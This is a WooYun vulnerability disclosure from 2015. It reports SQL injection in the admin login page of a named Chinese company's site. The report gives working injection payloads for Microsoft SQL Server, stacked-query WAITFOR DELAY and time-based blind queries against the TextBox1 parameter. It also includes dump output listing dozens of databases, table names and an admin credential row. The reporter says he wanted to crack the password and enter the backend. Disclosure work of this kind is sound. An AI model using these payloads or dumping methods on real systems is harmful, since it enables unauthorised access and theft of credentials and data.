当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113388

漏洞标题:信壹网络(刷机大师)某系统登录处SQL注射大量数据库

相关厂商:mgyun.com

漏洞作者: 路人甲

提交时间:2015-05-11 11:51

修复时间:2015-06-25 14:22

公开时间:2015-06-25 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

233

详细说明:

http://fx.mgyun.com/main/admin/login.aspx
(POST)
Button1=&TextBox1=rrNqPVs&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN%2bDvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA%3d&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA%3d%3d
参数textbox1
参考payload:
rrNqPVs';WAITFOR DELAY '0:0:5'--

漏洞证明:

---
Parameter: TextBox1 (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Button1=&TextBox1=rrNqPVs';WAITFOR DELAY '0:0:5'--&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA==
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: Button1=&TextBox1=rrNqPVs' OR 9245=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'fgsi'='fgsi&TextBox2=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEdAASHJB/7/ES5qw7oTlLMoJSqESCFkFW/RuhzY1oLb/NUVB2nXP6dhZn6mKtmTGNHd3PN+DvxnwFeFeJ9MIBWR693zA7sPhuVp7oyUWjddbTxrKvSqmddzonSdJITSPdfViA=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTk2MDA3NzM2ZGSUmCpyWWbsdK/7soAnkm/NxYDeJrd4mcNVYdeEDZxzSA==
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [67]:
[*] AnalyzeSystem
[*] ApkGrabDB
[*] AppCoolPoints
.............
Database: AnalyzeSystem
[7 tables]
+------------+
| Admin |
| Functions |
| Group |
| Manager |
| MenuConfig |
| Model |
| ModelGroup |
+------------+
从这里拿到管理密码。
Table: Admin
[1 entry]
+---------+---------+--------------------+----------+----------------------------------+
| AdminID | GroupID | DateLine | AdminPwd | AdminName |
+---------+---------+--------------------+----------+----------------------------------+
| 1 | 0 | 09 25 2012 3:43PM | 薍Ꝿꅻٴ塔 | 3f85cffcdcf****a8a3b66cd47f7afed |
+---------+---------+--------------------+----------+----------------------------------+
可惜还没爆破出来,要不还真想进后台看看!估计里面信息量够大吧!

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-05-11 14:21

厂商回复:

谢谢反馈。

最新状态:

暂无